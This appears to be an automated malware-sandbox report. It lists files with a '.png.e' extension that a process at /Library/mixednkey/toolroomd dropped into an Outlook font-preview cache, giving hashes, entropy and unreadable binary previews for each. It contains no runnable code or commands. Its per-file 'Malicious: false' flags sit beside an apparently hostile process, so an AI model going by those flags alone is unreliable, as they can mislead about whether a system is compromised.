Preview:	.<.\|.....f.A..}.r<.9.%...D.fu.;..bcZ..i .Y.a-sE.<.p.tZEn...@...4OR..xm..........5.....R...>....T\..OG4.Kj,D1K6lp_...wD.&.....5......GC.gx.B.>Dk.......I.u...Z.X.7....#...R'R...X...P.D...-p.&..M&'...1.j.?.g:.A..r.Q.WC.&...w0..a....&...nc.`.O.k...e.w......ih..5.u. c.&<..n....Io....J.S!........9j.`...l.e..Q...2.D.sU...........^.A].'x%w...9R.`...c#]..miG.._..WU6;.P3.Rw.h...,..0.y..T.. ....(.p.v...h........P..4.<b....[.3.].C....QK.<..q......}.N'.......%...s.z....j.. ..y!.j[.U96.D%.."..Q..m.i....<h@..z=...+...[...C.x.)ID...Pu...K..a...5j..h.....x......9.Fy4.\|....... .............kA..Uo.;....H4.@....]2.^.........Rs.u......:I\./..B.a.C..f.!k.tb...n>..k..l#.-...m..\..+..Q^>7W....\.4.\|....-*i.zu.l.7S..B.^.~..#....X....-.1w^.f...@.......d.I.n.8k...Pa....u.>Oz.2.3._K..{....uk.$...\.fA:......i...JR'.8w........v....n......g.........@.}<%...cC.......'..~>o%.o..L..>...\|r...=..J...0'm1>..h_..f.,.....O.Fn..H..XA....Ql.WDt......}u..8Aur..3

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SkiaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1002
Entropy (8bit):	7.174351056764482
Encrypted:	false
SSDEEP:	24:EfKp0eBRhon+0r5Po/VbdTNJAc0sePc0m7:EfKpZSn+0r5Po/VzJAbNpq
MD5:	A136C91362AC1E41BFF6DC3BD2ADEFCA
SHA1:	4BB191465A77C48FE1E8B2F143A9B00BBBB61D61
SHA-256:	AE097F49029BD3BE06C5542D71BB8FBC3C20A1DFDEC1869CD356FA51CEB9849B
SHA-512:	BABE392609F6B3F749E593AF2A153A9FA77A2E685B4F9CA7A38FE281292A6666FC0E918ED7D1948CC9093243FA6AFFCFD26C9928B07101740169F68A0F0F8B98
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.am1.T.)=2....Rmo......]..'7.>..?..a.....W.L...U.8D.U.....Q.s.....;.,..........7..!..7.,.7.L".G..7T.?%o.?LY..IW11P.. ...zP.....C...'...Bo.e..dd...gF..<.-m.lK.5o..DZ...-......wx.\...HV.^zz1.. E..uh..................H....E.2...Fy.=,.<........8eh.l~..tt.t..j.!Z..8m.?.d...W..=`@.,.'A./.z.0.............2...Y..zw...L..a4...+....?Z....$.!9..?.0....~..o.+dM...a:...i....1S..J.e.. .]...`...1...V.>EK.6.5.\|.....y..DO...-{....YC...s/......Q.j....:,....g..q...B.........o...U....&.c@^v.x^HG.Irq.Zt.PA. .....y....L...45..=...D~.:;.G..R.W6;..@........T.lC./.....<3dV........3.?%o.?LYx..w.+?..U...o........y.Ap...r.}...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Snell RoundhandRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	7.535043073614058
Encrypted:	false
SSDEEP:	48:EMSb3lXVYKYvzcfjJ02+cHX1wCJafbNpq:kbRVivAfjJN+cjcTu
MD5:	6A7E5539DEDE32DEC5A6AB4C2585DE69
SHA1:	75432A62C53C59DE8E8D92163A5D42F37B099F83
SHA-256:	3983D826C9280E1484A73B5DFA4022923D805F4AD93BAE352DF6DBBDBD41D98D
SHA-512:	D3E3CEE05F52E6F8D5ABB2B04B9B4A83B7B03BD6080FB8B7ED39B490BEF40D67F459C9BAACCD6069C01294556C35136457BC17497A87C2112449640D7A59048D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a3C}.w..z........~&`\.n...{...GX....Dh.a.$....5.+....N...+.wp4T.g.^..Y~....8...l_.FWv......-....r....\|..+.B..a.,W..t..@.._.@.zY.....ox.b..J....t..5EM4........I..q...7..-NsM.....i(C..g.8.Xc..f.&2........n..b..H........}.!W...nR..AR..e..}E.z.o...B./Z.N2....u..I.'V.h.r.^.........DH?..e.z.NET.i~..a..D"`..B.^...&...B.G.:...=..l%..B....ur.h.D.P8........c6ba.q[..k.n....t....H.?.....V4.ySI`.m.Xm.r.0.c.$....gQ...0.V.alY.(....Bhy>......V.v..S @!..\|,..W....M....Ui.p8...9<..X\..F..y..>b6..!....Z.n....wE6+.S.M\|..>q...[..c.<........G.(..A?1,......x....9.4.."S.......G.6~.v..$j.....s(].....;.>..U...>."x4...{.....3.8.....e...f.Imc..Cj.....o+.O..~.;b..\|...C.J.f...\.....[.gn.Y.@...#VL...K.@.,.f.......1.a...L.)....k&.A.h..?>vs..?..;A..S..Ru.......U....[...@..:.......bkN)*..=.>2".-f.W.=%..{..B..H.KMN..G;Gx2.....v.+.lU.O.n....b~g3....7.Y.0.vk2Kvy...Dy..aA...9..WX.....k..z....:.<.^.......e.p0b@..V.....F

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Songti SCRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1338
Entropy (8bit):	7.404578539446866
Encrypted:	false
SSDEEP:	24:EnbU5MqaybopOnCCaOYnaTxH1DBC8vwG4gH+8fnGNgQSWFuevf6sePc0m7:Eg5MqaaoIM3nabDRoMNfnGNgQdFT6Npq
MD5:	E60828CEED1E881BEFAF22D19CBEE67E
SHA1:	3509D645F465DC15FEACC8AC7075366361EA3C4D
SHA-256:	CD3AF22725D226729A3A7D0A126982DE176194754853D7A500F16C0C08F2D13C
SHA-512:	6403E35DE679228ACF31AEC13AD44F0AF25B27B4C7779F23C440D851040AD80AC43D3E15109808C7E861D5174F95DF5AD4159F59AB869389CD06A31BB3203D3C
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.au.8..F..,.r.'w.#.[IG...x.i.......{?.;6........7...............x.4..G....-.....M.\|.r.rFR..O..Z..q....H...........%.E........^`[.j.T\|?......>.q7...~[X....L...J..o.`..#Jw?.:~.8q`.J..e.~..0.)oN....85gX...."~.No[.=l?.E.6..}q.v5.....;e..%....0...I...X.]1..1.....XX........pr....`..H...D.....j.....Smb./.O}.M.n..=.J....^l.W.r...)..S61..%X?.........K......dq.n.d...@....^H.......A..A.x...<~..+..}.......V5w..\..c.o...D...xL.P.f!....u..hy...KI...@.w..0....4.....q$.S..bfw,.GC..O.O...c.,..v.y...R..WBP.........]]d..O;Bv+.fk.-.A..u...../..-....A.-.+....RM....-...o{.z...K.....%.-..m."K...f..<..b.P'..C........^..a...]&vi4W...v..&.#...L`..D.>...j9....[...8..X....7.......+Q..._{.aM55..+..s&o%..?..d.k.y9..D:R=.^..X...]+t...H......b..........`.I.S.%..5...H....K...L...O$..=..V..~.h..q..(.\...h.B?..q9....b9J>...B....i(A...&.....i.N...k.v.[.~......*?.......e.<..6.[.vQ C..a..<G<y...{q?<..XQ.r...[.....+-...%.E.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Songti TCRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	7.415931827273786
Encrypted:	false
SSDEEP:	24:EZQPIXmLOPKDfVijO0RltwKE8pCyX038zt/oNN3e8aesePc0m7:E+IXID9ufnwKZUst/4NOcNpq
MD5:	BD40BE4CF169F474DAB4D0AE0E15D71B
SHA1:	D6DC0421ECBB3E72D051EA7CB36ACA0AFDE42952
SHA-256:	84E1F3BBB095B25EAB96F9998B2C7855A99C4E98E7954218C21B921522288943
SHA-512:	03B46587357FD7EBA712A7FF47BC04840C2D55D794F3D379BCDE8EC0435255A92529085E6B4EC9AB41892B93F3B90BB30822703EE06467B06850201EA310B436
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a2..Gj.wm..pv0....5.........y.....[Vk-..NpE.....}CY.:...1...R5....j......hWl...S...\.......c.......yj/.R...Uv........6t.#.K.[.........:}.z..+..og......(.Ld..^..u.n.'..8.1.....!.\|.-.S.........1..#.g.m{...4"...*J.A8. '.(.P..I... ....l.U.....!4....XQb.vc..\|#..<..)..C..V{g..."[..1.LQ..s..B^.....Ef.'.Wc......u..D.r..._"..9^...fQ..Y...k.l...i.KL.'sF.Hu....o...9/;4..N..."..'...q$5.Z..+.B.7...........S...xp"]v.0..Yup.l.\..rF.8k..:;.....X8\g........(/....c..".\|zA.=.].?.?^H..M...V.^...Ub...$.e...e.Z..6...\|K.ko.._$....p....v......`........q..... 44O...M.E...#..,H.iM..5.J.N......../A..<...3.C..7.....2....]...n...,.aG......-;4..u....X...Z(.}...L;..T......)..#:+..HFLSa._...$d^.C.I).Tv....j..OD.r....9.1Q...u\.CBx,F....Z.$..A....Q~...p.......3.H.qGK[l...~#.p..1.XJ.h ...6..4...L...n..,....4P...ki.%.........8..a.F.3..J.mz....W6.L.V..z.m...X[...M.$d....W..g7..]z.........iG..$-St..I...[..2.r.Gl.au!

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Sukhumvit SetRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	7.524408985102721
Encrypted:	false
SSDEEP:	24:Et/7RyqBnqLDqQytu/v0jDUFbf+spy8Q7oWYli4t2Fol+jD2LR6kGsePc0m7:E1R5Bnq/1ytuUvYzrBQkWeRLcjERGNpq
MD5:	37F6D031CD0CA8C93A5792C7043FDD66
SHA1:	1EDD50C8CBB29A750D4A63E338BF36B7CDD9FE1D
SHA-256:	892667BB020B07630FC920260BEE98CF366DF68FF1ED4CE075F0FA55BC709186
SHA-512:	6DB3F21D942E1861953036572F1BB1A59038EF1E1483D9CDCC365CD9966A6108318A82840FC0382E4052F46DC10830B33EDFEDD4495CD3F74C4DB01009F238D0
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..KpXW&....._-..V~.I ..).R...u$:5O.nu.Vj..X..._...c....~$.O6....5.C....#.H.k...4.4...L............t..~R.=O..m"..X.7....#...R'R.....t;\....-...l..@K%(......m1jL[...=X.d......FD-P.U.a$.G..x....Dy.\....zL.K.?oJ.Q'.w.w%.i..O..c...n..=...$.P.......F.....+r~....S..6.LVK..N./..p2^.....Y..E2...>...;./....M.s7. .}d....V..../...........l...NZ...ZN..e.,.8..h.?.../.....y....{..L..o...n..>C......4[...........xS...X...~u.#..P....C..t........Yc..7..<..\.fF.+$x(........k1.X.q.K.2O.....Ri...VX..@l..Yl$>..,p...u.E...bNF.........V..+..'..b.(..59v{.%_..L..T.9.}.0.75B.X..,J..M.I.u.;.K.#yS..yw...t%..Rx.d76aV.N...W..c.....V..B'h..dC..f.q.b.!l...U?4....-EW.l.1..n%x.Pcq..PB.6V..c"..:$.j.vufo....e.A.....+.1@."%..x.V.k...(.......7......u..'J.e.Hxf.9...g..Y`...I..b=...q.......W.....lE..{:^..\|.=.D...M...5........C~......D.t.....$.}.I#.S.n...A..2tn....w.....\|....}0...j.K..P....p..n..h.r.,s..'q..{<...HW....2.R.2..x..l.GI

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SuperclarendonRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2090
Entropy (8bit):	7.696166552869731
Encrypted:	false
SSDEEP:	24:Eexsuxwcokrf3YOXEtKBOEATArw+ZmNXJhDuqhfkjNgXH2RrnPvFGon6JJeY+8sF:EexycokLNxOEAa1ZKhDhyNgXwYXeQNpq
MD5:	1152028AB3DB3D32C240BD2DCDFD211A
SHA1:	68AB7BDC6168D97AB65282EECE9BB0704E57C2F4
SHA-256:	A9CB0BABB802AC91053FB11002A135688E33EA5CA65C50DDABBEE7EBFE728299
SHA-512:	1BC5FDBC89AABC50AE7C24A62AC9F0E682FD66375F11853C2C217D5C53D250E29F766BE85DA584E19B41E0EE4FB86E08D5E6C7252E99116AB1396CE093CEBF11
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.^.E.K..M.#.m.w..]............=.gM.v.h.....R..5.[.?.............A... ....t..as ...>..w@Z1.iE..$6..>y.6.@[Yb..{.[Yb..{.Z.sP&PpK....#...<..Ijid.y5Q...k...<_.J..g.h_..X....@.....j..(o).. -.^z+....%.i..#..d.........^......3C...63....5..8..a.-.aR'S+......iV.Nn.......y..N.m+.~.\_....Ci..?.}...7...H%,..'....\|..:5...8....k_..&.._.i.G..\X.j.,k..q..4.p.q.`....D..k.9.b.0...y.....=U.....~....g....$.5.m....9q.d.H...]..;....r.d..o.....l.U...{...C..S...&...&S....H...^8wQnM....R..M....RQ.(.l(.q.$Tb.T.K........t.k.vX..j.*..h...Y.;Ar......X.X...~..^d.Q_.=u....2."..:........+.....\|g...S./:..\|..V...Xr..'...Z+.7@.h.g.P)..{..4=A..`...>.~..".K......O... >i....U.F...!...O.DK..Zy..U'..4B..... 5.....J....l...(e.#.I...9j$.....m.....U........v.kiM.Xi.B.M]N.Saw..1.#.v<z..Y)._l16.P.kB.(w.......B.....A."&.....;.>.w.9...t.6.<.UO...5.$....\.P..s.L.)JN..VA>j[.g$8..s[..f....B.n+.'V...EW.$9 g.W.M-\|...F...[./...+.+&L%.0.......

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.SymbolRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1250
Entropy (8bit):	7.365932278234722
Encrypted:	false
SSDEEP:	24:E71OV4geV8XBU3JFBk+MJMQpu51E2MU1QgY+h5gsePc0m7:ExEJeyhJVu51ELbgngNpq
MD5:	E7614AF6FEEDA620F934DD8C47D7E963
SHA1:	375E866FE6FB60DB4D521C605A4B9047427E7CE0
SHA-256:	593537F65ED4B9EEE00FB92EBEFA092AD0424DB7EADA7232FBA48D0ABEE12585
SHA-512:	D45DC5126A244E4F342B9509021755135609951E492D7C9804F32D745C5279DE76C753080FB6EFD4A017CF10461F1B148A31F83091E4712F1602D6C932BD2E76
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.M.7....dF.....^..p.....Q...}W6'P.h..8.o.2.^........d.XKY.P..../~.Y...'.q9."r....C....Q.s....I.!i{..%..U.....Mi.[...x..,.&.K..`jq.[.E.h.\|6..o.~..f...ib[..'S.P.[..].v...C.^.j-.........&K.5.&.J&s..'...@....GK....5....%z;..&..jM..$...Q...2..r.Gs}s...PP..vk.,..^c..w..A........w..FX..\|b...1.f.x......\k.n.....F.^..d.F..Az2..l 5..c.`...ZK.B...a..;.......e.....AQ.#.{.1:...F....q"....$.5.8.~...,.9p.T.....N....w..}M..W..jN.^..U.b.....!d...V...i&...gZw.....PBv/>d..$.0..p..Y...#.NX.T.....+..A..wn....6....."..,....{b/r.O....pU...=..l.p$;x..E..u(G.....jP..6-pq..T/..........P?.@.sL..o~....~.8q...[...&<...s.....q..:.b.Q]. ...H.1....33K.>.Q,.tUO..#....S...Gs.<9@.T....L...n8.0.qZ!<...J..B.Z9.'+.A.../...._.^d..c.l.\|..bg.+p..S.D....A<.J...y.....o..g..[O...X.zf...+z.....[d...OZ .!\|.k<.Rn...f.UI.hW-..d?.1.e......B.ku..n..S...iu.,..R.........i.M..+.X`[.$.Kg4..k...................\.........^./k..`R..V5..jd..ysVT9.X

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.TH SarabunPSKRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	7.578919706304053
Encrypted:	false
SSDEEP:	48:EgvgmaqIjCtB2MpfoAig1WLOniOZ0lkNpq:bvgK32EfoAig1gOniOKlku
MD5:	A94669E342BE15391A2BAF29DA809FA2
SHA1:	1475108CFC208316D3523E3FB375E70E0420B60C
SHA-256:	553FBC59D223BCD7ED2219667A0E29CB8EF5CC76F304A766EC094D97B51A7F56
SHA-512:	D40F7B4CD81D87D8ED1428AFA60F4C3AEFCBAEB2B589EBD6C2A7265F4CAC29BBF0BE0E953C842D61B9E3D4FD3EBF1425AD5337FE1676FE031B2C5328A577A0DB
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.9.&m.....Ms.H..K.9.../...\5..M.{...&Z2...Q..-..%/!..r4.M.+5.ae8.'.Q......$.uN.Q..K.c.......}Q.J'..R....)QUB...'.&WR...J.f1!.a6.~....\|g#.>7.`>..z.kU..!O5.s.C......}r.k...?.X.f..;..}.............M63.....{.1.Pkk.l...@.9..%W.........(..(.\|..l.B...@UWIG..PF.7...d..i..... .k....B.d+9...?...M1.GW..=}..W.q....o.....\|.1.m.......6..jz..)[.g..9[.....X~..c.<....lf<....[c.2....H..7^s.T.A.X..[a.@i.=.KfS/..E".. .%.G.K&...SW.#....+,n.z.......0.B9)..SzWb#Z.!\6E[/.Aq..U..-D......]...,.Z.......B.s.>.t.._....1....&.\...N&..4...+.....x.#....A..& ...O......F..l..p..........t.N...\|y...:.WV....Yk&.F....W}%....3.'$$.\|.u..-K7'..U\|.@.#,.Jt.6J...8....A.b3?,.8......[..m...U*o....m.\|...U..j..M..a..yX..J...3.Bq6..-....sv.(.J...L.....m.(WM.-e-......._B...Y...Z...N....}...).a..Z ...]....S......~........[....S%@s.%..X...~~..kT...x.t..C.5.9hb.T....p.g<.%......KY.X.p.r..13lB.....{.&1..xSM#).z.3....7..\|'Y...3b..V...^>n.Jx.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.TahomaBold.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1138
Entropy (8bit):	7.27101366941446
Encrypted:	false
SSDEEP:	24:E+1/MINCIL5XXOl5ONYXlZaRzn+2HOSsePc0m7:E+ppOqYXWRn+ZSNpq
MD5:	B4DB693D80FF1A7BE52719F7C156B26F
SHA1:	380ADF0122BAE6EC5E19D07817BBD60FDCDEF1D5
SHA-256:	ED5893961210A7D18A5A9A391888A9ADF0849701F66D492CB038FE1BD4007CE2
SHA-512:	F58B925160AA55AB121E5D7B9276AECCB38FE4DE0A8B963E3F21C1FFED2BD80326490521E2DFBE86C3FA7C8F560A1C16E6A8F9D45A971B9B65A4BCFB2B5830A1
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a\m.....B..\|...H...Y....i._.....O...j.I.<M."suy..h.9.E.].....Z..8.C).'....unr\_.b.i..y<.!.!..~.E\.....Quw..f..yH....!.f.q.~.........B.X>.....NE..".>.......n.\.;'.........9T..j..y.q!f.......4.a.q..mV..&......U....,..3.Gn.\|h.X#.$.J....hx."a...Wll.l.......n...b..b..`..&i4..9t.&(..'.h}j...O..GP..D........7:z..yt...[.;....]...Z........[5.Z.'...f.5.5.z..p^.=C8..0SG}#t..[W..$......L/t$.<IA.+S.[u.Bs.E..I.,b._...s~>:3..T.=.rl..e.6D\.N{.....=..x..S.'[...E.g.U..K{..]..}...A.Q.....$.....U...C.C......Q.....b.4P2L.%Bn...c...l.:T...}.q......@k...{..b.j...iB.....=.\F,...L<..7.'.O.Q...=...E<m...VNviG....a..9....~.....;.....0.K.<.....t..V..c\...H..Ne..b\..?U.P.}..h...........Y.`..+...c? >D.9_.0....r...^S..F.Y'za.(V.............;....y...Q%..x..S.A.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.TahomaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1138
Entropy (8bit):	7.27101366941446
Encrypted:	false
SSDEEP:	24:E+1/MINCIL5XXOl5ONYXlZaRzn+2HOSsePc0m7:E+ppOqYXWRn+ZSNpq
MD5:	B4DB693D80FF1A7BE52719F7C156B26F
SHA1:	380ADF0122BAE6EC5E19D07817BBD60FDCDEF1D5
SHA-256:	ED5893961210A7D18A5A9A391888A9ADF0849701F66D492CB038FE1BD4007CE2
SHA-512:	F58B925160AA55AB121E5D7B9276AECCB38FE4DE0A8B963E3F21C1FFED2BD80326490521E2DFBE86C3FA7C8F560A1C16E6A8F9D45A971B9B65A4BCFB2B5830A1
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a\m.....B..\|...H...Y....i._.....O...j.I.<M."suy..h.9.E.].....Z..8.C).'....unr\_.b.i..y<.!.!..~.E\.....Quw..f..yH....!.f.q.~.........B.X>.....NE..".>.......n.\.;'.........9T..j..y.q!f.......4.a.q..mV..&......U....,..3.Gn.\|h.X#.$.J....hx."a...Wll.l.......n...b..b..`..&i4..9t.&(..'.h}j...O..GP..D........7:z..yt...[.;....]...Z........[5.Z.'...f.5.5.z..p^.=C8..0SG}#t..[W..$......L/t$.<IA.+S.[u.Bs.E..I.,b._...s~>:3..T.=.rl..e.6D\.N{.....=..x..S.'[...E.g.U..K{..]..}...A.Q.....$.....U...C.C......Q.....b.4P2L.%Bn...c...l.:T...}.q......@k...{..b.j...iB.....=.\F,...L<..7.'.O.Q...=...E<m...VNviG....a..9....~.....;.....0.K.<.....t..V..c\...H..Ne..b\..?U.P.}..h...........Y.`..+...c? >D.9_.0....r...^S..F.Y'za.(V.............;....y...Q%..x..S.A.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Tamil MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	7.169131984041019
Encrypted:	false
SSDEEP:	24:EhEwtnJD7gMzBDFG79yJeluX8HifD5dsePc0m7:E28VgMzyBao1HivNpq
MD5:	DCC16A066F87943899F5FD825DA3744E
SHA1:	780964FE2B706E12A393DBBE45DA19949BEE3450
SHA-256:	35299098482340BD805890235CC0775594791F75FE76B9C51E75735C3AF059D8
SHA-512:	380FA87D9906F400BD6CB5A9A6C09EB661EF91796A9DA07DA59B750FBC6901A21F60CD9037B2C7D6CE652F6109627BFAE6A16C93E98F8E03835968898E006CC3
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.afz..Fh......z..-+.b}^..mz......K..=.>.. .Eh.j\.1;.d.F.-_.c....p....e...D.\|....#9[.... .......\|.S.......~#2R-.-5"s..}m....._..{A.._.!....6...dF..LG/...~uqi1.o.......X.&...Sun.%....".&u....z!h.kT....a.T.s... .1] .r.. ..#.....0....{...JS.......b.].X..k...!.+.>.._.f;....-......i.....iJ..H.,e.....O.6+...K._.1...V...."..f}..@]......Y....F..........E.'.......{...G].X.&TC}x...~......{$....Nkg{...[.Tn .4..<..@ I..R..RT.ne........ihJ..K.Yz.^0..&....\|.-..,e.x.)5d.\|..0....;.`..U".@..07..q..bbxqR...L.k..3...Rxm..G..Y..N...K~................Q^.g.S,.,d..XF.h......LaSQ.....".S..a... ..'W\...D%.8OKe....^T{.~4.J.;7...7@{...Jm.. ..#..0.$j=%..V...P.h...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Tamil Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1794
Entropy (8bit):	7.593506588653168
Encrypted:	false
SSDEEP:	24:E0jgA4JNEeTZ6uet4I185crKEceEQDiTgLSuvdQNjd+vEtLQDK9zB0w+sePc0m7:E0YJpAtJ85IKEcg2kpFQNjfLisf+Npq
MD5:	231DC4DABBBDF58A88E1CC0881179086
SHA1:	F1C1946C7A73F053002807E81E566A8C7A19698C
SHA-256:	785077C15208418138A10DF9E516D53DEA554EBCFAA510A80B7617CD054EB372
SHA-512:	9FA9913DE62B27755BF74E57CD55FEE4546DFF8900343228CF25B6D7D8C3D3E56F5742D2FF3AEFF76A1703FDD926C3310D6F8A5999B613BEC73DBF0D367D7A52
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a........$<..m..@.z0.t..?....bPD.fV..$.,.g...T.CD.B.dG.Cw......7Y....[..!f=..G.P.z.M.v.e....!y.5.(..=..x.%..8..B..c...q?:..<D7..An.%J.,...d.<`........F.X...\|..'...gi....(..Sg.7.vP..f_..gO....`.u..d......X...~...B......R...:...4...Y..../..n."...B.......P..-.%O.7.PP.....l-.5.V....@..-G<W'.~.9\..w.i.h..d.i/1Sd..F....l.K@.s...;.^..%...<...27q.N!.Ra.".`.v.....y0.X.5B...Q.).L...m.av?($.......O.....7...P...K.9.P..Iy_c.i(8..".Q1c.jp-.3...,.........M^.%..z.{....E....,k...?..P.....8..a.([...0....p.......0....fV..>......`..^V. .....[I.2..9K.O....^B^..?..Ds....r..[.d._..."X...H.5.r...v2p.R......<T<..i..d .S...m..I+.`...x.'8....vOK...K.A.U..R.c.u......?.+.-`U\|\...w.4....D+.,....$.p..U>..]..C.y...~v..-."..^k..@.zYG....)0.q.%.IH.:N...".j......)\..`..b..q.5Xz_.`Q.{'......R(.L.!I.1..q.L..3...'6...8.3.26.'.B....u..e...r..TX.9Z'....7B.z.r....i..z"..FP.<U....S}Po7+..S.P....g"..p.[4l...hc

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Telugu MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1386
Entropy (8bit):	7.417876132361699
Encrypted:	false
SSDEEP:	24:YubFVyufHQtn26vBaRipzyFdhNn+qeufCgHN73lm9F5k83icJOsePc0m7:YubvF4HBFpyFlcuqgt45kYibNpq
MD5:	08AFF219C32EFCE0C910BE73B097CCFE
SHA1:	005706C1219CA6E1285839423DEFB8E49E1AB294
SHA-256:	8AC643C1D7D7BE208AB074DD41B2A0027935BF47DD322B8CBC335431D0A49882
SHA-512:	E4A037840256E9E302A91B48379E9261A2E9BFE8F862B8FFA4366B56180D01AAC4E2207B0F925D027356DD51562B699E1BA7A6FFAA33C249843A41C42EE6D29B
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.ar.&3......rv....r.......R..wE.Wd.L....QN..~..[.4...7.d.`iR.}.....o.......Y.'.i.ytk..e$.$h.7.....].KJ}.r.).!.H.>..D..{.....Yj..3..U.J[B.i.[x}.PH.c.....l.`..3..$&.....3Eq..K...z..?..r..H..g....dBB..lXH...i.8f.S\|..P...x.\.....=....,..>'(.....LLn.:e\|.t.!^...+j.5..[41.P..S.<?..a.ii7..Uh..]n`L...K.....^J....7.C.p.1....Q...l...-LU...Gtjim.+..7=h...~..jB..OJ}..#5.8..O...#v..w..........iX>...+...e...`HO...-.y.2s...O....A.'..D....Y..u......h.E.../....u.}vk.s.y...Z..d@.=h.....~..b-...3.......D.~1...9}... '......\|........R.C...........9.,....Yh.wW.NT..qv.3....$.>NA..#..,..~Y..:,[R.9...k.........^4.#.<E..X.]....~@j...._.......?.+.....H..:..15.....v..Vc.$x..@.k.....T..z'.5.(...V..C.`]e..n.lb...O..s.\....k......UK.5]q\...n.[..faA"l&...H.....1@.E....F.pf...?2.....K\|..:.)I...G@.k..../.X.(..'.P:m.nXS1...}.N\|.;=.>.....)....aq6.y.b[..1.>m.........M%.V2.M.\|s.$Z8....6..g4.^<=y.}tB....S.........:..S....c..u,!.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Telugu Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1938
Entropy (8bit):	7.634334171026211
Encrypted:	false
SSDEEP:	48:C7FJQgXUkrmSvSUeXDq+nlsC+fd/s14jNpq:C7FJQg6uYpn6C++qju
MD5:	9F4BF5AB610CD1F30A8C45C53D77604A
SHA1:	56BAA3771C597918E0A755DDA7FC920069A918C9
SHA-256:	CF8328B16A6995731BC5F42BE8B63C07466B8A221A2895649091730628DA9689
SHA-512:	3655FC70F27DA6A8005FA95D5ED23AFB53E311632BC9BDE95CAAE082D7EBDF943C93C5A78171F253A46B003C50A72EEAE8C4117FF224E5D5C8D066282E030B9B
Malicious:	false
